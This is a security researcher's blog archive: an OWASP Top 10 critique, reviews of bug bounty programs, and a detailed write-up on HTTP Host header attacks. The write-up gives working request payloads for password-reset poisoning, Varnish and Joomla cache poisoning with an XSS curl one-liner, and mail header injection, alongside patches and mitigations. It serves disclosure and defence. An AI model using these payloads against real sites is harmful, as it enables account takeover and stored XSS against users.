Monday, 24 April 2017

Abusing OWASP with 'Insufficient Attack Protection'

I have no love for drama, but over the last couple of years I’ve witnessed some shameless abuse of OWASP by commercial interests, and I feel it's important to call this out.

The latest draft of the OWASP Top 10 ‘Most Critical Web Application Security Risks’ added a new entry at A7, titled ‘Insufficient Attack Protection’. It claims that failing to detect and respond to attacks is a critical risk.

This is a surprising and distinctly out of place addition to the top 10; every other entry is a serious vulnerability that poses a notable risk by itself, whereas failure to detect attacks is only hazardous when combined with a real vulnerability.

Furthermore, addressing any other entry in the top 10 provides a clear net positive to a webapp’s security posture, whereas complying with A7 can easily cause a net harm. Complying with A7 makes it extremely awkward to run an accessible bug bounty program, since it will hinder researchers trying to help you out. It also increases your attack surface (much like antivirus software) and introduces the risk of denial of service attacks by spoofing attacks from other users.

I’m not the only one in the community who thinks Insufficient Attack Protection has no place in the top 10 - a poll by @thornmaker found 80% of 110 respondents thought it should be removed.

At this point, you might be wondering where A7 came from. According to a contributor, it was "suggested by Contrast Security and *only* by Contrast Security".

I wonder why Contrast Security made this suggestion? Well, we can find a clue on their website - they’ve already started using A7 to flog ‘Contrast Protect’, their shiny attack protection solution:
A7: Insufficient Attack Protection. This new requirement means that applications need to detect, prevent, and respond to both manual and automated attacks. […] Contrast Protect effectively blocks attacks by injecting the protection directly into the application where it can take advantage of the full application context.

Still, perhaps I shouldn’t rush to assume Contrast Security is acting in bad faith and abusing the OWASP brand name to sell a product. It’s not like they’ve done anything like this before, is it?

In 2015 Contrast/Aspect released a tool to evaluate vulnerability scanners dubbed “OWASP Benchmark”. This is much lower profile than the OWASP Top 10, but I work for a web scanner vendor myself so it caught my attention. Just like the new OWASP Top 10, there was something a bit odd about it - it ranked Contrast’s scanner vastly higher than all the competition, something they made sure to point out in marketing materials.

Here’s what Simon Bennetts, the OWASP project leader for ZAP, had to say:
Here we have a company that leads an OWASP project that just happens to show that their offering in this area appears to be _significantly_ better than any of the competition. Their recent press release stresses that its an OWASP project, make the most of the fact that the US DHS helped fund it but make no mention of their role in developing it.

Simon's post caused extensive discussion on the OWASP leaders mailing list, eventually leading to Jim Manico (an OWASP board member at the time) calling for the project to be demoted to 'incubator' status, to reflect the project's immaturity. The project remains in incubator status today. This hasn’t stopped Gartner from using it to compare scanning vendors, so I guess Contrast still got their money’s worth.

All in all I think it’s pretty clear why Insufficient Attack Protection has suddenly appeared. Perhaps the OWASP Top 10 should be demoted to incubator status too :-)

- albinowax

Thursday, 11 August 2016

Reviewing bug bounties - a hacker's perspective

A prospective bug bounty hunter today has very little information on which to base his or her decision about which programs to participate in. There's a dramatic horror story every few months and that's about it. This is unfortunate because bounty hunting is founded on mutual trust; nobody wants to spend hours auditing a target only to find out that the client is disrespectful, incompetent, or likes to avoid paying out. I thought it might be helpful to write up reviews of the different bounty programs and platforms that I've dealt with.

You might be wondering exactly how much bug bounty hunting I've done in order to feel qualified to write this, particularly as I only bother writing up bounties if I consider them highly notable. I've been doing this in my spare time for roughly five years - my first bounty from Google was back in 2011, and I reported enough issues to star in their 0x0A list when it was first created in 2012. Over the years I've also reported a bunch of issues to Mozilla, a few of which are public (side note: the SQLi on is hilarious). Other activity is visible on HackerOne, Cobalt, Bugcrowd, and in a few blog posts. I've received maybe 50 separate bounties in total. I view this as a decent sample.

I’ll try to provide the evidence and reasoning behind my conclusions, particularly when I had a poor experience with a program. Due to trust being critical to the bounty process, if my first experience with a bounty program was bad I would never use it again. So, if I give somewhere a bad review it’s always possible I was just unlucky. If you strongly agree or disagree with any of these reviews, do drop a comment or write up your own experience.

To keep things competitive, I’ve sorted the reviews by how good the overall experience is. Scroll down for the dirt.

Program Reviews


Google

Google is consistently a pleasure to work with. They have a highly skilled, responsive and respectful security team, and offer healthy payouts. They also offer to double bounties if you donate them to charity, which is pretty cool. And they sometimes send shiny gifts to their top researchers, and there's the awesome party in Vegas... The only ‘downside’ is that these days, actually finding a decent vulnerability in one of their core products can be tricky relative to other targets.

We do have a disagreement about who bears responsibility for preventing CSV Injection attacks but they're going to change their minds soon so that's ok ;)
Uber (hackerone)
Uber is my current focus for bounty hunting because their scope is huge, they pay exceptionally well, and they don’t try to wriggle out of paying rewards. My last three bounties from Uber were $3000, $7500 and $5000, for reflected and stored XSS. As their bounty program is much younger than Google’s, it takes significantly less effort to find decent vulnerabilities in their websites.

Uber’s commitment to putting everything in scope is exceptional - Uber and Bugcrowd both use the same third party to host their documentation, and while Bugcrowd declared their documentation out of scope Uber worked with the third party to keep their documentation in scope. The somewhat amusing result is that if it wasn’t for Uber’s bug bounty program, it would be trivial to get administrative access to

That said, I’ve found their triage team a little frustrating at times. For example, I provided a detailed writeup clearly explaining how to replicate some reflected XSS, and they responded by asking me to submit a video. I get the impression that they sometimes skim-read reports and miss critical details such as “It's designed to work in Internet Explorer 11”.


Mozilla

Mozilla is interesting in that you often get to interact directly with the developers responsible for fixing your vulnerabilities, via Bugzilla. This can be a blessing and a curse - it’s important to remember you can always summon the security team to mediate. I did have one bad experience with them early on - I reported a stored XSS bug where I couldn’t provide a PoC due to a length limitation, and the developer fixed it within a few hours then argued it wasn’t a security issue. However, at other times I’ve been paid $3k for vulnerabilities I thought were pretty lame - they certainly aren’t stingy with payouts.

Mozilla are another example of where diligent bounty scoping improves the security of the entire web ecosystem. While many bounty programs refuse to pay up for exploits in third party code, Mozilla happily pay for any exploits for the Django framework that you can replicate on, and everyone using Django is undoubtedly more secure as a result.

Another benefit of Mozilla is that if you request it, they’re happy to publicly disclose most bugs after they’ve been fixed. I view this as significantly better than being placed in a generic hall of fame, particularly if you’re early in your career - potential employers can see the technical details of your bugs. Overall I enjoy working with Mozilla even if the process isn’t always as slick as Google.


Shortly after their program opened, I reported CSRF via form-action-hijacking to them and got $1,000 on one of their highly 1337 debit cards for my troubles. It took quite a few emails before their security team fully understood the vulnerability, but they were cordial the whole time and the vulnerability is pretty esoteric so that’s understandable.


Piwik

As you might expect from a free, open-source project, the bounties aren’t massive - I got $242 for unauthenticated stored XSS - but they’re friendly and highly responsive. The main thing to beware of is that although they’ll give public credit, they prefer that critical vulnerability details aren’t disclosed even after patches have been released, to mitigate poor patch uptake.

I don't think this is a great policy, but it helps to understand the context behind it. Piwik is the only program where I’ve personally seen clear evidence of black-market interest in high-quality exploits. I think this is because it’s deployable and widely used - you could probably get a foothold in all sorts of organisations with an exploit for it.

CodePen (bugcrowd)

CodePen are the coolest program I’ve dealt with that doesn’t pay cash bounties. I got remote code execution on their site a few times, had a nice chat with them, and they graciously agreed to let me disclose the full details at BlackHat USA last year.


Prezi

I reported stored XSS on to them on April 20th, and they replied within 2 days but didn’t actually confirm it until June 6th, which is pretty slow. The reward was $500 and I have yet to be paid, but I have confidence it’ll arrive one of these months.

The most notable thing about Prezi’s program is that they go to extraordinary lengths to prove that they aren’t cheating people by fraudulently marking issues as duplicates, using secret gists on GitHub. It’s cool that they make this effort, but I think it’s really unnecessary; if you view a company as dishonest you should stay well clear of their bounty program. There are plenty of other ways they can screw you over if they want to.

AwardWallet, Zendesk, Informatica, WP-API, Fastmail, unnamed others

I’ve reported issues to them without anything of note happening, other than Zendesk claiming the dubious achievement of awarding me the lowest non-zero bounty I've ever received for XSS - $50, with which I could just about buy lunch out after tax.

Cloudflare (hackerone)

Their program appears to be under-resourced. I reported an XSS to them on April 16th and they took over two weeks to first respond to it, and still have yet to fix it. This is sadly a frequent occurrence with programs that don’t pay cash bounties. Even if you’re bounty hunting for recognition rather than income, I’d recommend focusing on programs that pay a token cash bounty because at least you can be reasonably sure they take it seriously.

(bugcrowd)

I reported a fairly serious vulnerability to these guys and they fixed the issue and changed the status to resolved without saying a word. While I admire their efficiency, I've had better interactions with vending machines.


eBay

I reported a serious CSRF issue to eBay several years ago and, despite numerous emails back and forth, they failed to understand it. As far as I know the issue remains unpatched to this day.

Dropbox (hackerone)

Dropbox state that they pay $5000 for XSS, so when I reported a vulnerability that could be used to gain read/write access to users’ Dropbox folders given a small amount of user interaction, I was a bit puzzled to get $0. The exploit is a bit unusual, so instead of trusting my reasoning you might want to take a look at the report and come to your own conclusion. I’m not surprised that they protested when I requested public disclosure of the issue. On the bright side, I found the vulnerability by accident, so I only wasted about half an hour on them.

Western Union (bugcrowd)

Western Union appears to be a glaring exception to the concept that companies that pay cash bounties take their programs seriously.

I reported two vulnerabilities to them. Both were (in my professional opinion) fairly serious, and distinctly obvious. The first was marked as a duplicate of an issue reported over a year prior. Failing to patch an obvious vulnerability for over a year shows disrespect towards the numerous researchers who inevitably waste their time reporting it. The second received a $100 reward. When a company claims they pay $100-$5000 per vulnerability, I find it somewhat surprising to receive $100 for a bug that could probably be used to steal money.

Zomato (hackerone)
Zomato have provided my worst bounty experience so far. I generally have low expectations for commercial companies that don't pay cash bounties, but I was still surprised when they refused to reply to my issue, even after I used HackerOne's apparently ineffective 'request mediation' feature.

After 90 days I decided to publicly disclose the issue, only to discover they had silently patched it. I'm still waiting for them to reply to my submission, or mark it as resolved. Here's the entire thrilling report:

I wrote up the associated research over at

Platform Reviews

HackerOne platform

Of all the bug bounty platforms, HackerOne comes across as the best developed from a hacker’s perspective. I particularly appreciate the deeply integrated support for full disclosure and overall transparency. You can easily identify the payout range of many programs using publicly disclosed vulnerabilities, and spare yourself unpleasant surprises. The reputation/signal system also makes it stand out. Yet another cool HackerOne feature I'd like to see on other platforms: if the hacker requests it, vulnerabilities are automatically disclosed after a fixed period without the company having to manually approve it.

One problem I've encountered on HackerOne is vendors not noticing reports. I had to use a personal contact to get WP-API to respond to a serious access control bypass, and an issue I reported to BitHunt 6 months ago still hasn't received a reply. I invoked HackerOne's 'request mediation' function on BitHunt, and they failed to respond too. Inactive companies should really be clearly marked as such, to prevent researchers wasting their time.

I’ve found companies that offer larger bounties are less likely to have this issue - sizeable rewards are a good indicator that the company is actually committed to the bounty program.

Cobalt platform

Cobalt (formerly crowdcurity) has a whole bunch of bitcoin related websites which are really fun to hack, although the bounties aren’t the biggest. Regardless of the bounty size, I like the warm fuzzy feeling of knowing I could have stolen a huge number of bitcoins if I felt like it. Unfortunately I can’t name the specific sites, but will be disclosing technical details of many of these vulnerabilities in my "Exploiting CORS Misconfigurations for Bitcoins and Bounties" presentation at OWASP AppSecUSA.

Cobalt's platform isn't dripping with as many features as HackerOne's but it does the job. It also lets hackers score bug bounty programs and provide feedback, which is frankly awesome - reputation shouldn't just apply to hackers. I don't know if this is directly related, but on the whole I've had good experiences with programs on Cobalt, and definitely recommend giving them a shout. The main thing to beware of is that payouts can take a while - someone found a race condition in the bitcoin withdrawal function and I think they're all manually reviewed now.

Bugcrowd platform
After a few poor experiences in a row with programs on Bugcrowd I mostly avoid them, and therefore don't have much to say. I think they've been around the longest, and they don't deliver payments in bitcoins (subjecting all non-US users to PayPal’s awful exchange rates), but they evidently put effort into engaging with the community by presenting at conferences and releasing tools.

I’m sure there are good programs on there but I'll leave hunting them down to someone else.

About Payouts

Posts on bug bounties are frequently visited by commenters suggesting that the bug hunter could have got more cash by selling the vulnerability on ‘the black market’. My last payout was $5000 from Uber for an issue that took me six hours to find and write up. Do I feel shortchanged? No, and I wouldn’t have felt shortchanged with $500 either. I’m always happy to receive a large payout but I don’t feel entitled to it unless there’s a clear precedent. Could I have used that vulnerability to hijack a bunch of Uber developer accounts and cause well over $30k of carnage? Probably, but why would I want to do that? I honestly hope I won’t feel compelled to revisit this topic later. We’ll see.

That was it?

If you believe what some people write, you might conclude that every bug bounty program is out to exploit testers, wriggle out of paying rewards, pretend issues are duplicates, and generally act in bad faith. As you've hopefully gathered by reading this far, this does not reflect my own experience at all, and it would be a shame if this misconception put anyone off bounty hunting. The primary causes of drama seem to be broken expectations about payout size and program scope. Companies can mitigate these by writing clearly defined bounty briefings and encouraging publicly disclosed reports. Hackers can mitigate these by reading the briefs, using available information like publicly disclosed reports to set their expectations, and providing feedback on both good and bad experiences.

Hope that's helpful! Feel free to drop your own reviews in the comments or on your own site.

Monday, 25 April 2016

Exploiting Uber and Piwik with adapted AngularJS payloads

I don't normally blog about bug bounty findings, but I recently found a couple on Piwik and Uber, based on AngularJS template injection, that have some interesting technical subtleties. As such, I've published it on

The Piwik exploit may actually allow unauthenticated RCE so I'd suggest patching ASAP. Many thanks to @garethheyes for helping with the payload adaptations.

Wednesday, 19 August 2015

Server-Side Template Injection

I've written up a novel technique to get RCE on webservers - Server-Side Template Injection - over at I presented this at Black Hat USA 2015 - you can watch a recording at

Shortly afterwards, I presented at 44Con 2015 on Hunting Asynchronous Vulnerabilities. You can read a summary at or watch the recording (paid only, alas) at

Wednesday, 18 February 2015

Exploiting Path Relative Style-Sheet Imports (PRSSI)

I've posted a detailed breakdown of how to successfully exploit path-relative stylesheet imports and navigate the associated pitfalls over at


Saturday, 30 August 2014

Comma Separated Vulnerabilities

My latest research, on exploiting spreadsheet-export functionality to attack users via malicious formulae, is over at:

Please note I no longer work at Context.

Wednesday, 1 May 2013

Practical HTTP Host header attacks

    Password reset and web-cache poisoning

        (And a little surprise in RFC-2616)


How does a deployable web application know where it is? Creating a trustworthy absolute URI is trickier than it sounds. Developers often resort to the exceedingly untrustworthy HTTP Host header ($_SERVER['HTTP_HOST'] in PHP). Even otherwise-secure applications trust this value enough to write it to the page without HTML-encoding it, with code equivalent to:
     <link href="http://$_SERVER['HOST']"    (Joomla)

...and append secret keys and tokens to links containing it:
    <a href="http://$_SERVER['HOST']?token=topsecret">  (Django, Gallery, others)

...and even directly import scripts from it:
      <script src="http://$_SERVER['HOST']/misc/jquery.js?v=1.4.4">  (Various)

There are two main ways to exploit this trust in regular web applications. The first approach is web-cache poisoning: manipulating caching systems into storing a page generated with a malicious Host header and serving it to others. The second technique abuses alternative channels, like password reset emails, where the poisoned content is delivered directly to the target. In this post I'll look at how to exploit each of these in the presence of 'secured' server configurations, and how to successfully secure applications and servers.

Password reset poisoning

Popular photo-album platform Gallery uses a common approach to forgotten-password functionality. When a user requests a password reset, it generates a (now) random key:

Places it in a link to the site:

and emails it to the address on record for that user. [Full code] When the user visits the link, the presence of the key proves that they can read content sent to the email address, and thus must be the rightful owner of the account.

The vulnerability was that url::abs_site used the Host header provided by the person requesting the reset, so an attacker could trigger password reset emails poisoned with a hijacked link by tampering with their Host header:
> POST /password/reset HTTP/1.1
> Host:
> ...
> csrf=1e8d5c9bceb16667b1b330cc5fd48663&name=admin
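The vulnerable pattern is easy to sketch. The following Python fragment (hypothetical names and paths - Gallery's actual code is PHP) shows how a reset link built from the client-supplied Host header ends up pointing wherever the attacker chooses:

```python
import secrets

def build_reset_link(headers: dict, username: str) -> str:
    """VULNERABLE: derives the link's origin from the Host header."""
    token = secrets.token_hex(16)
    # In a real application the token would also be stored against the
    # user's account before the email goes out.
    host = headers["Host"]  # attacker-controlled
    return f"http://{host}/password/do_reset?token={token}"

# The attacker requests a reset for the victim's account, but tampers
# with the Host header in their own request:
link = build_reset_link({"Host": "evil.example"}, "admin")
# The victim's email now contains a link to evil.example; clicking it
# hands the secret token straight to the attacker.
```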

    This technique also worked on Django, Piwik and Joomla, and still works on a few other major applications, frameworks and libraries that I can't name due to an unfortunate series of mistakes on my part.

Of course, this attack will fail unless the target clicks the poisoned link in the unexpected password reset email. There are some techniques for encouraging this click but I'll leave those to your imagination.

In other cases, the Host may be URL-decoded and placed directly into the email header allowing mail header injection. Using this, attackers can easily hijack accounts by BCCing password reset emails to themselves - Mozilla Persona had an issue somewhat like this, back in alpha. Even if the application's mailer ignores attempts to BCC other email addresses directly, it's often possible to bounce the email to another address by injecting \r\nReturn-To: followed by an attachment engineered to trigger a bounce, like a zip bomb.
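To see why URL-decoding the Host into mail headers is so dangerous, consider this simplified Python sketch (illustrative only, not any real application's mailer): naive string interpolation lets a CRLF sequence in the decoded value smuggle an extra header past the mailer.

```python
def build_mail_headers(host: str, to_addr: str) -> str:
    """VULNERABLE: interpolates an unvalidated value into mail headers."""
    return (
        f"To: {to_addr}\r\n"
        f"Subject: Password reset for {host}\r\n"
    )

# A Host value whose %0d%0a was URL-decoded into a real CRLF turns the
# 'Bcc' line into a header in its own right:
evil_host = "example.com\r\nBcc: attacker@evil.example"
headers = build_mail_headers(evil_host, "victim@example.com")
```

A mailer consuming these headers would copy the reset email to the attacker. The fix is to reject or encode CR and LF in anything interpolated into a header.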

Cache poisoning

Web-cache poisoning using the Host header was first raised as a potential attack vector by Carlos Bueno in 2008. Five years later there's no shortage of sites implicitly trusting the Host header, so I'll focus on the practicalities of poisoning caches. Such attacks are often difficult, as all modern standalone caches are Host-aware; they will never assume that the following two requests reference the same resource:

> GET /index.html HTTP/1.1       > GET /index.html HTTP/1.1
> Host:              > Host:

So, to persuade a cache to serve our poisoned response to someone else, we need to create a disconnect between the Host header the cache sees and the Host header the application sees. In the case of the popular caching solution Varnish, this can be achieved using duplicate Host headers. Varnish uses the first Host header it sees to identify the request, but Apache concatenates all Host headers present and Nginx uses the last Host header[1]. This means that you can poison a Varnish cache with URLs pointing at by making the following request:
> GET / HTTP/1.1
> Host:
> Host:
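The disconnect boils down to the two parsers resolving duplicate headers differently, which is easy to model in Python (a simplified illustration with made-up hostnames, not real server parsing code):

```python
def host_varnish(headers):
    """Varnish-style: key the cache entry on the first Host header."""
    return next(v for k, v in headers if k.lower() == "host")

def host_nginx(headers):
    """Nginx-style: the application sees the last Host header."""
    return [v for k, v in headers if k.lower() == "host"][-1]

request = [("Host", "victim.example"), ("Host", "evil.example")]

# The cache files the poisoned page under victim.example, while the
# application generated its content using evil.example - that mismatch
# is the poisoning vector.
assert host_varnish(request) == "victim.example"
assert host_nginx(request) == "evil.example"
```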
Application-level caches can also be susceptible. Joomla writes the Host header to every page without HTML-encoding it, and its cache is entirely oblivious to the Host header. Gaining persistent XSS on the homepage of a Joomla installation was as easy as:
curl -H "Host: cow\"onerror='alert(1)'rel='stylesheet'" | fgrep cow\"

This will create the following request:
> GET / HTTP/1.1
> Host: cow"onerror='alert(1)'rel='stylesheet'

The response should show a poisoned <link> element:
<link href="http://cow"onerror='alert(1)'rel='stylesheet'/" rel="canonical"/>
To verify that the cache has been poisoned, just load the homepage in a browser and observe the popup.

'Secured' configurations

So far I've assumed that you can make an HTTP request with an arbitrary Host header arrive at any application. Given that the intended purpose of the Host header is to ensure that a request is passed to the correct application at a given IP address, it's not always that simple.

Sometimes it is trivial. If Apache receives an unrecognized Host header, it passes the request to the first virtual host defined in httpd.conf. As such, it's possible to pass requests with arbitrary Host headers directly to a sizable number of applications. Django was aware of this default-vhost risk, and advised users to create a dummy default vhost to act as a catchall, ensuring that Django applications were never passed requests with unexpected Host headers.

The first bypass for this used X-Forwarded-For's friend, the X-Forwarded-Host header, which effectively overrode the Host header. Django was aware of the cache-poisoning risk and fixed this issue in September 2011 by disabling support for the X-Forwarded-Host header by default. Mozilla neglected to update, which I discovered in April 2012 with the following request:
> POST /en-US/firefox/user/pwreset HTTP/1.1
> Host:
> X-Forwarded-Host:

Even patched Django installations were still vulnerable to attack. Webservers allow a port to be specified in the Host header, but ignore it for the purpose of deciding which virtual host to pass the request to. This is simple to exploit using the ever-useful syntax:
> POST /en-US/firefox/user/pwreset HTTP/1.1
> Host:

This resulted in the following (admittedly suspicious) password reset link:

If you click it, you'll notice that your browser sends the key to before creating the suspicious URL popup. Django released a patch for this issue shortly after I reported it:

Unfortunately, Django's patch simply used a blacklist to filter @ and a few other characters. As the password reset email is sent in plaintext rather than HTML, a space breaks the URL into two separate links:

> POST /en-US/firefox/users/pwreset HTTP/1.1
> Host:
Django's followup patch ensured that the port specification in the Host header could only contain numbers, preventing the port-based attack entirely.

However, the arguably ultimate authority on virtual hosting, RFC 2616, has the following to say:

5.2 The Resource Identified by a Request
If Request-URI is an absoluteURI, the host is part of the Request-URI. Any Host header field value in the request MUST be ignored.

The result? On Apache and Nginx (and all compliant servers) it's possible to route requests with arbitrary Host headers to any application present by using an absolute URI:
> Host:
This request results in a SERVER_NAME of but a HTTP['HOST'] of. Applications that use SERVER_NAME rather than HTTP['HOST'] are unaffected by this particular trick, but can still be exploited on common server configurations. See HTTP_HOST vs. SERVER_NAME for more information on the difference between these two variables.

Django fixed this in February 2013 by enforcing a whitelist of allowed hosts - see the documentation for more details. However, these attack techniques still work fine on many other web applications.

Securing servers

Due to the aforementioned absolute-URI technique, making the Host header itself trustworthy is almost a lost cause. What you can do is make SERVER_NAME trustworthy. This can be achieved under Apache (instructions) and Nginx (instructions) by creating a dummy vhost that catches all requests with unrecognized Host headers. It can also be done under Nginx by specifying a non-wildcard SERVER_NAME, and under Apache by using a non-wildcard ServerName and turning the UseCanonicalName directive on. I'd recommend using both approaches wherever possible.
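For Nginx, the catch-all can be sketched like this (a minimal example - the hostname and the choice of response are illustrative, so adapt them to your deployment):

```nginx
# Default server: receives any request whose Host header matches no
# configured server_name, and drops it.
server {
    listen 80 default_server;
    server_name _;
    return 444;   # Nginx-specific: close the connection without replying
}

# The real site is only reached on an exact server_name match.
server {
    listen 80;
    server_name example.com;
    # ... application configuration here ...
}
```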

A patch for Varnish should be released shortly. As a workaround until then, you can add the following to the config file to collapse duplicate Host headers into a single value:
        import std;

        sub vcl_recv {
            std.collect(req.http.host);
        }

Securing applications

Fixing this issue is difficult, as there is no entirely automatic way to identify which host names the administrator trusts. The safest, albeit mildly inconvenient, solution is to use Django's approach of requiring administrators to provide a whitelist of trusted domains during the initial site setup. If that is too drastic, at least ensure that SERVER_NAME is used instead of the Host header, and encourage users to use a secure server configuration.
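The whitelist check itself is simple. Here's a Python sketch of the Django-style approach (illustrative only, not Django's actual implementation); note that it also insists the port is numeric, which rejects the @ and space tricks shown earlier:

```python
ALLOWED_HOSTS = {"example.com", "www.example.com"}  # illustrative whitelist

def validate_host(raw_host: str) -> str:
    """Return the bare host if trusted; raise otherwise.

    Splits off at most one ':port' suffix and requires it to be numeric,
    so values like 'example.com:80 evil.example' are rejected too.
    """
    host, sep, port = raw_host.partition(":")
    if sep and not port.isdigit():
        raise ValueError(f"malformed Host header: {raw_host!r}")
    if host not in ALLOWED_HOSTS:
        raise ValueError(f"untrusted Host header: {raw_host!r}")
    return host

# Legitimate ports pass; everything else is refused before the value
# reaches link generation, caching, or email code.
assert validate_host("example.com:8080") == "example.com"
```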

Further research

  • More effective / less inconvenient fixes
  • Automated detection
  • Exploiting wildcard whitelists with XSS & window.history
  • Exploiting multipart password reset emails by predicting boundaries
  • Better cache fuzzing (trailing Host headers?)

Thanks to Mozilla for funding this research via their bug-bounty program, Varnish for the handy workaround, and the teams behind Django, Gallery, and Joomla for their speedy patches.

If you're interested in automated detection of this issue, check out the ActiveScan++ plugin I made for Burp Suite (disclaimer: I work for PortSwigger). For a discussion of how this extension works, and a demo of web-cache poisoning against Typo3, see the following video from OWASP AppSec EU: ActiveScan++: Augmenting manual testing with attack proxy plugins.

Feel free to drop a comment, email or DM me if you have any observations or queries.